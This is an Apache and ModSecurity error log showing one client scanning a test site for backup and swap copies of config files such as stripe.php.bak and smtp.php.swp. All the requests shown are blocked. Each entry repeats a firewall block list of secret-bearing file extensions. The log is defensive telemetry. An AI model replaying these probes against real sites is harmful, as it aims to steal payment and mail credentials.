[Fri Jan 16 03:21:22.911183 2026] [:error] [pid 1444031] [client 45.148.10.246:52764] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgon-9MmrgwjmYTAJT0gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.swp
[Fri Jan 16 03:21:22.911543 2026] [:error] [pid 1444031] [client 45.148.10.246:52764] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgon-9MmrgwjmYTAJT0gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.swp
[Fri Jan 16 03:21:22.911702 2026] [:error] [pid 1444031] [client 45.148.10.246:52764] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/smtp.php.swp"] [unique_id "aWmgon-9MmrgwjmYTAJT0gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/smtp.php.swp
[Fri Jan 16 03:21:23.053323 2026] [:error] [pid 1444035] [client 45.148.10.246:52776] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo7auW6yeGWXfDeFYeQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.bak
[Fri Jan 16 03:21:23.053646 2026] [:error] [pid 1444035] [client 45.148.10.246:52776] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo7auW6yeGWXfDeFYeQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.bak
[Fri Jan 16 03:21:23.053812 2026] [:error] [pid 1444035] [client 45.148.10.246:52776] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo7auW6yeGWXfDeFYeQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.bak
[Fri Jan 16 03:21:23.327216 2026] [:error] [pid 1444226] [client 45.148.10.246:52796] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo2cpoCUgeFICb0bf8gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.bak
[Fri Jan 16 03:21:23.327538 2026] [:error] [pid 1444226] [client 45.148.10.246:52796] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo2cpoCUgeFICb0bf8gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.bak
[Fri Jan 16 03:21:23.327693 2026] [:error] [pid 1444226] [client 45.148.10.246:52796] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo2cpoCUgeFICb0bf8gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.bak
[Fri Jan 16 03:21:23.456266 2026] [:error] [pid 1444032] [client 45.148.10.246:52800] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo-kMvq8uPO2ZciWrTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.bak
[Fri Jan 16 03:21:23.456605 2026] [:error] [pid 1444032] [client 45.148.10.246:52800] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo-kMvq8uPO2ZciWrTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.bak
[Fri Jan 16 03:21:23.456790 2026] [:error] [pid 1444032] [client 45.148.10.246:52800] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.bak"] [unique_id "aWmgo-kMvq8uPO2ZciWrTgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.bak
[Fri Jan 16 03:21:24.641081 2026] [:error] [pid 1444032] [client 45.148.10.246:52886] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpOkMvq8uPO2ZciWrTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.old
[Fri Jan 16 03:21:24.641456 2026] [:error] [pid 1444032] [client 45.148.10.246:52886] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpOkMvq8uPO2ZciWrTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.old
[Fri Jan 16 03:21:24.641647 2026] [:error] [pid 1444032] [client 45.148.10.246:52886] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpOkMvq8uPO2ZciWrTwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.old
[Fri Jan 16 03:21:24.774418 2026] [:error] [pid 1444040] [client 45.148.10.246:52900] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpPn_5sIyKhJ5GAza4QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.old
[Fri Jan 16 03:21:24.774746 2026] [:error] [pid 1444040] [client 45.148.10.246:52900] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpPn_5sIyKhJ5GAza4QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.old
[Fri Jan 16 03:21:24.774945 2026] [:error] [pid 1444040] [client 45.148.10.246:52900] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.old"] [unique_id "aWmgpPn_5sIyKhJ5GAza4QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.old
[Fri Jan 16 03:21:27.703559 2026] [:error] [pid 1444032] [client 45.148.10.246:53048] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgp-kMvq8uPO2ZciWrUgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.swp
[Fri Jan 16 03:21:27.703894 2026] [:error] [pid 1444032] [client 45.148.10.246:53048] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgp-kMvq8uPO2ZciWrUgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.swp
[Fri Jan 16 03:21:27.704057 2026] [:error] [pid 1444032] [client 45.148.10.246:53048] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgp-kMvq8uPO2ZciWrUgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/stripe.php.swp
[Fri Jan 16 03:21:28.111696 2026] [:error] [pid 1444031] [client 45.148.10.246:53060] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqH-9MmrgwjmYTAJT1wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.swp
[Fri Jan 16 03:21:28.112039 2026] [:error] [pid 1444031] [client 45.148.10.246:53060] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqH-9MmrgwjmYTAJT1wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.swp
[Fri Jan 16 03:21:28.112218 2026] [:error] [pid 1444031] [client 45.148.10.246:53060] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqH-9MmrgwjmYTAJT1wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/stripe.php.swp
[Fri Jan 16 03:21:28.321469 2026] [:error] [pid 1444035] [client 45.148.10.246:53064] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqLauW6yeGWXfDeFYfgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.swp
[Fri Jan 16 03:21:28.321813 2026] [:error] [pid 1444035] [client 45.148.10.246:53064] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqLauW6yeGWXfDeFYfgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.swp
[Fri Jan 16 03:21:28.321975 2026] [:error] [pid 1444035] [client 45.148.10.246:53064] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/stripe.php.swp"] [unique_id "aWmgqLauW6yeGWXfDeFYfgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/stripe.php.swp
[Fri Jan 16 03:21:28.444052 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:53072] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.bak
[Fri Jan 16 03:21:28.603026 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:53080] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.bak/
[Fri Jan 16 03:21:28.713583 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:53092] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php.bak
[Fri Jan 16 03:21:28.922476 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:53100] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php.bak
[Fri Jan 16 03:21:29.065737 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:53108] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.back
[Fri Jan 16 03:21:29.224097 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:53116] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.back/
[Fri Jan 16 03:21:29.437205 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:49768] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php.back
[Fri Jan 16 03:21:29.599248 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:49782] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php.back
[Fri Jan 16 03:21:29.717032 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:49796] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.old
[Fri Jan 16 03:21:29.911812 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:49800] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.old/
[Fri Jan 16 03:21:30.029890 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:49802] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php.old
[Fri Jan 16 03:21:30.141471 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:49818] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php.old
[Fri Jan 16 03:21:30.283041 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:49834] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe_backup.php
[Fri Jan 16 03:21:30.482009 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:49842] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe_backup.php/
